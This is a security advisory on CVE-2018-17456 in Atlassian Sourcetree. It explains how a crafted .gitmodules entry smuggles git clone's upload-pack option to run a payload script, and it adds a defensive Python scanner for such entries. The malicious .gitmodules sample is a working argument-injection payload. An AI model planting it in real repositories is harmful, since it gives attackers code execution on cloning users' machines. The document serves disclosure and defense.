ASA-2019-00128 – Sourcetree: Input validation vulnerability via Git submodules


Allele Security Alert

ASA-2019-00128

Identifier(s)

ASA-2019-00128

Title

Input validation vulnerability via Git submodules

Vendor(s)

Atlassian

Product(s)

Sourcetree

Affected version(s)

Sourcetree for macOS starting with 1.2 before version 3.1.1
Sourcetree for Windows starting with 0.5a before version 3.0.17

Fixed version(s)

Sourcetree for macOS version 3.1.1
Sourcetree for Windows version 3.0.17

Proof of concept

Yes

Description

Sourcetree for macOS before version 3.1.1 and Sourcetree for Windows before version 3.0.17 were both vulnerable to CVE-2018-17456. A remote attacker with permission to commit to a git repository linked in Sourcetree for macOS or Windows is able to exploit this issue to gain code execution on the system.

Technical details

The .gitmodules file looks as follows:

[submodule "x:x"]
    path = x:x
    url = -u./payload

The injected command is set by the url: -u./payload points the upload-pack option (-u) of git clone at the payload shell script. Note also the : within the path; this part is needed to actually get the payload script executed.

The path will end up as the repository URL in the subsequent clone operation:

execve("/usr/lib/git-core/git", ["/usr/lib/git-core/git", "clone",
"--no-checkout", "--progress", "--separate-git-dir",
"/tmp/huhu/.git/modules/x:x", "-u./payload", "/tmp/huhu/x:x"],...

The actual URL from .gitmodules is interpreted as the -u argument, which is why the path takes its place as the repository argument.

The colon matters because it lets the URL get past these lines in transport.c:

} else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {
    struct bundle_transport_data *data = xcalloc(1, sizeof(*data));
    transport_check_allowed("file");
    ret->data = data;
    ret->vtable = &bundle_vtable;
    ret->smart_options = NULL;

url_is_local_not_ssh returns false because of the colon in the path, so later on in the code the smart_options containing the uploadpack setting are still in place:

} else {
    /* Unknown protocol in URL. Pass to external handler. */
    int len = external_specification_len(url);
    char *handler = xmemdupz(url, len);
    transport_helper_init(ret, handler);
}

if (ret->smart_options) {
    ret->smart_options->thin = 1;
    ret->smart_options->uploadpack = "git-upload-pack";
    if (remote->uploadpack)
        ret->smart_options->uploadpack = remote->uploadpack;
    ret->smart_options->receivepack = "git-receive-pack";
    if (remote->receivepack)
        ret->smart_options->receivepack = remote->receivepack;
}

The requirement for a colon in the path seems to hinder exploitation on Windows, as a colon is a forbidden character in a Windows path. However, as some people noted during the disclosure, Git running within the Windows Subsystem for Linux or Cygwin will allow exploitation on Windows hosts.
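As an added defender-side example (not part of the advisory or of Git's own code): a small Python scanner that parses a .gitmodules file and flags the traits described above, a url or path beginning with '-' and a ':' in the path. The sample .gitmodules is constructed here from the advisory's entry plus a benign one; example.invalid is a placeholder host.

```python
import re
from typing import Dict, List

# Constructed sample (example.invalid is a placeholder): the advisory's entry plus a benign one.
SAMPLE_GITMODULES = """\
[submodule "lib/benign"]
    path = lib/benign
    url = https://example.invalid/benign.git
[submodule "x:x"]
    path = x:x
    url = -u./payload
"""

SECTION_RE = re.compile(r'^\[submodule\s+"(?P<name>[^"]+)"\]$')
KEY_RE = re.compile(r'^(?P<key>[A-Za-z][\w-]*)\s*=\s*(?P<value>.*)$')


def parse_gitmodules(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for the [submodule "name"] / key = value layout."""
    modules: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue  # blank line or git-config comment
        section = SECTION_RE.match(line)
        if section:
            current = modules.setdefault(section.group("name"), {})
            continue
        kv = KEY_RE.match(line)
        if kv and current is not None:
            current[kv.group("key").lower()] = kv.group("value").strip()
    return modules


def audit_gitmodules(text: str) -> List[str]:
    """Return one finding per suspicious trait; an empty list means clean."""
    findings: List[str] = []
    for name, entry in parse_gitmodules(text).items():
        url, path = entry.get("url", ""), entry.get("path", "")
        # CVE-2018-17456 trait: a value starting with '-' is parsed by git clone
        # as an option instead of a repository or directory (here -u == --upload-pack).
        for field, value in (("url", url), ("path", path)):
            if value.startswith("-"):
                findings.append(f"{name}: {field} {value!r} starts with '-' (option injection)")
        # The advisory notes a ':' in the path is needed for the payload to run.
        if ":" in path:
            findings.append(f"{name}: path {path!r} contains ':' (colon trick)")
    return findings
```

Run audit_gitmodules over the .gitmodules of any repository before it is cloned or added to a client such as Sourcetree; a non-empty result means the file should be inspected by hand.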

Credits

Terry Zhang (Tophant)

Reference(s)

Sourcetree Security Advisory 2019-03-06
https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2019-03-06-966678691.html

Input validation vulnerability via Git in Sourcetree for Mac – CVE-2018-17456
https://jira.atlassian.com/browse/SRCTREE-6394

Input validation vulnerability via Git in Sourcetree for Windows – CVE-2018-17456
https://jira.atlassian.com/browse/SRCTREEWIN-11292

[Announce] Git 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1
https://marc.info/?l=git&m=153875888916397&w=2

CVE-2018-17456
https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6

RCE via Git submodules PoC
https://github.com/joernchen/poc-submodule

CVE-2018-17456
https://github.com/xichawai/CVE-2018-17456

CVE-2018-17456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17456

CVE-2018-17456
https://nvd.nist.gov/vuln/detail/CVE-2018-17456

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: March 12, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.